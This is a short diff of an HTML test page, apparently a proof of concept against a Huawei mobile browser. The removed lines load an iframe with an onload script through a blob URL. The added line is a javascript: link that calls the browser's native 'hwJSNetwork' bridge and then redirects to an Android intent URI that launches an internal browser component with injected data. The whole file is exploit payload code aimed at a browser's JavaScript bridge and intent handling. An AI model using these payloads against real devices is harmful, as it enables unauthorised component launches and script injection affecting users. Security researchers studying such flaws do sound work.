--- a/try.html
+++ b/try.html
@@ -1,8 +1,5 @@
 <html>
 <body>
-<script>
-	var blob = new Blob(['<iframe onload=document.alert(top.document.documentElement) src=#></iframe>'], {type: "text/html"});
-	location.href=URL.createObjectURL(blob);
-</script>
+<a href=javascript:hwJSNetwork.sendData("https://naver.com", "GET", "", "", "location.replace('intent:#Intent;component=com.huawei.browser/com.huawei.browser.Main2;package=com.huawei.browser;action=android.intent.action.MAIN;S.data=daum.net;end;')")>gogogo</a>
 </body>
 </html>
